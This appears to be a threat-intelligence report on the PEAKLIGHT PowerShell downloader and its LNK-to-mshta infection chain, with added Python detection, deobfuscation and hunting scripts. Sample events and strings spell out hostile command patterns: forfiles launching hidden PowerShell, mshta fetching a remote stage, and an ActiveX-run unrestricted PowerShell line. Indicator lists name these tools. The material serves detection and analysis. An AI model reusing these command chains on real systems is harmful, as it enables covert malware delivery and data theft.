A memory-only JavaScript dropper, delivered via a Microsoft Shortcut File, initiates a chain of attacks by downloading a PowerShell script named PEAKLIGHT, which in turn fetches and executes malicious payloads like LUMMAC2, SHADOWLADDER, and CRYPTBOT.
These payloads, malware-as-a-service infostealers, harvest sensitive data from the infected systems; the attackers host the malicious components on a content delivery network (CDN), which helps the infrastructure persist and evade detection.
Investigators discovered a malware campaign using ZIP archives with filenames resembling popular movies that contained a malicious LNK file disguised as a media icon.
The LNK file likely redirected users to another LNK file hosted on a specific IP address and containing various malicious commands, though the exact nature of the commands wasn’t immediately identified.
A malicious LNK file exploited the forfiles.exe utility to search for the win.ini file in the C:\Windows directory. Upon finding a match, it executed a PowerShell script that fetched a second-stage payload from a remote URL.
The payload was then executed using mshta.exe. As a decoy, a seemingly benign video file was played in Windows Media Player to mask the malicious activity.
The attackers employed a malicious LNK file to execute PowerShell commands that discreetly launched mshta.exe, a system binary proxy, to run malicious code retrieved from a remote server.
They used wildcards (*) in the registry path to target Mshta and the dot sourcing operator to execute the retrieved script, and they also leveraged a reputable content delivery network (CDN) to host their malicious payloads, bypassing security filters and enhancing their evasion capabilities.
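The LNK-to-mshta chain described above (forfiles.exe launching PowerShell, which launches mshta.exe against a remote URL, alongside a Windows Media Player decoy) leaves a recognisable process tree in endpoint telemetry. The following is an added detection example, not code from the original report or from Mandiant; it runs three rules over a constructed set of simplified Sysmon-style process-creation events. The event fields, PIDs, paths and the `cdn.example.invalid` URL are all invented for the sample.

```python
import re

# Constructed sample of process-creation events (Sysmon Event ID 1 style,
# reduced to the fields the rules need). All values are invented.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # LNK lure: forfiles.exe matches win.ini and runs its /c argument
    {"pid": 201, "ppid": 100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmd": r'forfiles.exe /p C:\Windows /m win.ini /c "powershell -w hidden -c <script omitted>"'},
    {"pid": 202, "ppid": 201,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c <script omitted>"},
    {"pid": 203, "ppid": 202, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://cdn.example.invalid/stage2"},
    {"pid": 204, "ppid": 202,
     "image": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "cmd": r'wmplayer.exe "C:\Users\alice\Downloads\trailer.mp4"'},
    # Benign administrator activity that must not be flagged.
    {"pid": 300, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-ChildItem C:\\Logs"},
    {"pid": 301, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def image_name(event):
    """Lower-cased file name of the process image."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image names from pid up to the root, e.g. [mshta, powershell, forfiles, explorer]."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (pid, rule_name) pairs for events matching the chain described above."""
    hits = []
    for e in events:
        name = image_name(e)
        cmd = e["cmd"].lower()
        chain = ancestry(events, e["pid"])
        # Rule 1: forfiles.exe used as a proxy to start a script host via /c
        if name == "forfiles.exe" and "/c" in cmd and ("powershell" in cmd or "cmd" in cmd):
            hits.append((e["pid"], "forfiles_proxy_execution"))
        # Rule 2: mshta.exe pulling its content from a remote URL
        if name == "mshta.exe" and URL_RE.search(e["cmd"]):
            hits.append((e["pid"], "mshta_remote_content"))
        # Rule 3: the full forfiles -> powershell -> mshta ancestry
        if name == "mshta.exe" and chain[1:3] == ["powershell.exe", "forfiles.exe"]:
            hits.append((e["pid"], "forfiles_powershell_mshta_chain"))
    return hits


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Rule 3 is the high-confidence one: forfiles.exe is rarely a legitimate parent of PowerShell, and PowerShell spawning mshta.exe with a URL almost never is. Rules 1 and 2 fire individually and are useful for hunting even when the parent link is lost (for example when the events come from a source that does not record parent PIDs).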
An analyzed HTML file contained a JavaScript dropper obfuscated as decimal-encoded ASCII character codes; decoding it revealed a script that used a helper function to decode further obfuscated data.
It contained a command to be executed with elevated privileges through an ActiveX object. Variations of this dropper were also found, using hex-encoded or Base64-encoded payloads within strings.
These payloads launched PowerShell with a hidden window and an unrestricted execution policy, converted the encoded data (hex or Base64) into a byte array, decrypted it (AES, with varying modes and keys), and finally executed the PowerShell code that emerged.
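An analyst triaging such a dropper first has to peel the encoding layers (decimal character codes, `\x` hex escapes, Base64) before the behaviour described above becomes visible. The code below is an added example, not from the original report; it strips those three encodings iteratively and flags the indicators the text mentions. The AES stage cannot be handled this way, because the key and mode live inside the script itself, so the decoder leaves encrypted bytes opaque. The sample inputs are constructed stand-ins built inside the block purely so the decoder has something to work on; the script text they encode is a placeholder, not a real dropper.

```python
import base64
import binascii
import re

# Strings whose presence in a decoded layer marks it for analyst attention.
# They mirror the behaviour described above: an ActiveX-launched, hidden,
# unrestricted PowerShell and a Base64 payload being turned into bytes.
INDICATORS = (
    "ActiveXObject", "WScript.Shell", "powershell", "-WindowStyle Hidden",
    "-ExecutionPolicy Unrestricted", "FromBase64String", "mshta",
)

DECIMAL_RUN = re.compile(r"(?:\b\d{1,3}\s*,\s*){7,}\b\d{1,3}\b")   # 8+ comma-separated codes
HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")                 # 8+ \xNN escapes
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")                  # long Base64 runs


def _printable(raw):
    return bool(raw) and all(32 <= b < 127 or b in (9, 10, 13) for b in raw)


def _decode_decimal(m):
    vals = [int(v) for v in re.findall(r"\d{1,3}", m.group(0))]
    return bytes(vals).decode("latin-1") if all(v < 256 for v in vals) else m.group(0)


def _decode_hex(m):
    return bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1")


def _decode_b64(m):
    try:
        raw = base64.b64decode(m.group(0), validate=True)
    except (binascii.Error, ValueError):
        return m.group(0)
    # Accept the decode only if it yields text; a random alphanumeric run will not.
    return raw.decode("ascii") if _printable(raw) else m.group(0)


def peel(text, max_depth=5):
    """Strip decimal, hex-escape and Base64 layers until nothing changes.
    Returns every layer seen, outermost first. Encrypted (AES) stages are
    left untouched because their key is not recoverable from the text alone."""
    layers = [text]
    for _ in range(max_depth):
        cur = layers[-1]
        nxt = DECIMAL_RUN.sub(_decode_decimal, cur)
        nxt = HEX_RUN.sub(_decode_hex, nxt)
        nxt = B64_RUN.sub(_decode_b64, nxt)
        if nxt == cur:
            break
        layers.append(nxt)
    return layers


def triage(text):
    """Peel the layers and report which indicators appear in any of them."""
    layers = peel(text)
    found = sorted({i for layer in layers for i in INDICATORS if i.lower() in layer.lower()})
    return {"layers": len(layers), "indicators": found, "final": layers[-1]}


# Constructed samples: a placeholder script body wrapped in each of the three
# encodings the report describes. Built here only to exercise the decoder.
_PLAIN = ('new ActiveXObject("WScript.Shell").Run('
          '"powershell -WindowStyle Hidden -ExecutionPolicy Unrestricted -c <omitted>", 0);')
SAMPLE_DECIMAL = "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in _PLAIN) + "));"
SAMPLE_B64 = 'var p = "' + base64.b64encode(_PLAIN.encode()).decode() + '";'
SAMPLE_HEX = '"\\x70\\x6f\\x77\\x65\\x72\\x73\\x68\\x65\\x6c\\x6c"'   # decodes to "powershell"

if __name__ == "__main__":
    for sample in (SAMPLE_DECIMAL, SAMPLE_B64, SAMPLE_HEX):
        print(triage(sample)["indicators"])
```

The indicator list is deliberately short and keyed to the page's description; in practice it would be extended with the organisation's own hunting strings, and `peel` would be run on the whole HTML body rather than on a single string.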
Peaklight, a malicious PowerShell downloader, targets Windows machines and comes in two variations. Both check for specific ZIP files (L1/L2.zip or K1/K2.zip) in designated folders (AppData or ProgramData).
If they are missing, they download the ZIPs from remote servers and extract them. Variation 1 executes the first alphabetically sorted executable found inside, while Variation 2 runs the first encountered one.
Variation 1 also fetches an image and potentially communicates with a server, while Variation 2 focuses solely on ZIP downloads and execution. Both utilize obfuscated functions for string manipulation, downloading, and file operations.
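Because both variations stage their payloads as L1.zip/L2.zip or K1.zip/K2.zip under AppData or ProgramData, those archive names are a cheap host-level hunting artefact. The script below is an added example (not code from the original report); it walks those roots a few levels deep, reports matching archives and, for each one, lists the executable-looking members in alphabetical order, which is the order Variation 1 uses to pick what to run. The exact subfolder the downloader uses is not stated above, so the walk covers the roots generically; `demo()` builds a constructed temporary tree so the logic can be exercised without touching a real host.

```python
import os
import tempfile
import zipfile

# Archive names PEAKLIGHT checks for and downloads if absent, per the description above.
PEAKLIGHT_ARCHIVES = {"l1.zip", "l2.zip", "k1.zip", "k2.zip"}


def default_roots():
    """AppData and ProgramData on the local host (Windows); empty list elsewhere."""
    roots = [os.environ.get("APPDATA"), os.environ.get("LOCALAPPDATA"),
             os.environ.get("PROGRAMDATA")]
    return [r for r in roots if r and os.path.isdir(r)]


def executables_in(zip_path):
    """Executable-looking members, sorted as Variation 1 would sort them."""
    try:
        with zipfile.ZipFile(zip_path) as zf:
            names = [n for n in zf.namelist() if n.lower().endswith((".exe", ".dll"))]
    except (zipfile.BadZipFile, OSError):
        return []
    return sorted(names)


def find_peaklight_artifacts(roots, max_depth=3):
    """Walk each root up to max_depth levels and report matching archives."""
    findings = []
    for root in roots:
        root = os.path.abspath(root)
        base_depth = root.count(os.sep)
        for dirpath, dirnames, filenames in os.walk(root):
            if dirpath.count(os.sep) - base_depth >= max_depth:
                dirnames[:] = []  # prune: do not descend further
            for fn in filenames:
                if fn.lower() in PEAKLIGHT_ARCHIVES:
                    path = os.path.join(dirpath, fn)
                    findings.append({"path": path, "name": fn,
                                     "executables": executables_in(path)})
    return findings


def demo():
    """Run the scan on a constructed directory tree (no real host data involved)."""
    with tempfile.TemporaryDirectory() as tmp:
        sub = os.path.join(tmp, "Roaming")
        os.makedirs(sub)
        with zipfile.ZipFile(os.path.join(sub, "K1.zip"), "w") as zf:
            zf.writestr("setup_b.exe", b"constructed placeholder, not a real binary")
            zf.writestr("a_helper.dll", b"constructed placeholder")
            zf.writestr("readme.txt", b"ignored by executables_in")
        with open(os.path.join(tmp, "notes.zip"), "wb") as fh:  # unrelated name, never opened
            fh.write(b"")
        return find_peaklight_artifacts([tmp])


if __name__ == "__main__":
    for hit in find_peaklight_artifacts(default_roots()) or demo():
        print(hit["path"], hit["executables"])
```

A match on the file name alone is only a lead: the names are short and generic enough that a benign collision is possible, so the member listing and the archive's creation time and originating process should be checked before escalating.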
According to Mandiant, the downloader delivers three variants of payloads through archives. Variant 1 includes Cryptbot infostealer (Setup.exe) and SHADOWLADDER malware (LiteSkinUtils.dll, bentonite.cfg).
Variant 2 utilizes SHADOWLADDER (touggie.txt, Aaaa.exe, WCLDll.dll) and CRYPTBOT.AUTOIT (erefgojgbu), while Variant 3 leverages LummaC.V2 infostealer (WebView2Loader.dll, oqnhustu) and compromised legitimate executables (hgjke.exe) for side-loading malware (Ufa.au3).
In summary, PEAKLIGHT is a PowerShell-based downloader that checks for the payload archives locally, fetches them from a CDN when they are absent, and relies on obfuscation and system binary proxies to evade detection.